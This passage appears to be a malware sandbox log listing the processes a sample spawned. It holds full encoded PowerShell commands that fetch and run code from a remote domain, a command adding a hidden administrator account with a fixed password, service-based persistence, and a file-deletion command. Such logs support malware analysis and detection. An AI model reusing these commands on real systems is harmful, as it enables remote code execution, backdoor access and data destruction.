      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8A4C.tmp" "c:\Users\user\AppData\Local\Temp\wpyeyr2r\CSCD8967564BBC847D191922ABCF6C6B3B.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf"
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2348 --field-trial-handle=1660,i,15687082423060682323,12488084436830173186,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: unknownProcess created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
      Source: unknownProcess created: C:\Windows\Temp\myRdpService.exe C:\Windows\Temp\myRdpService.exe cakoi10
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOw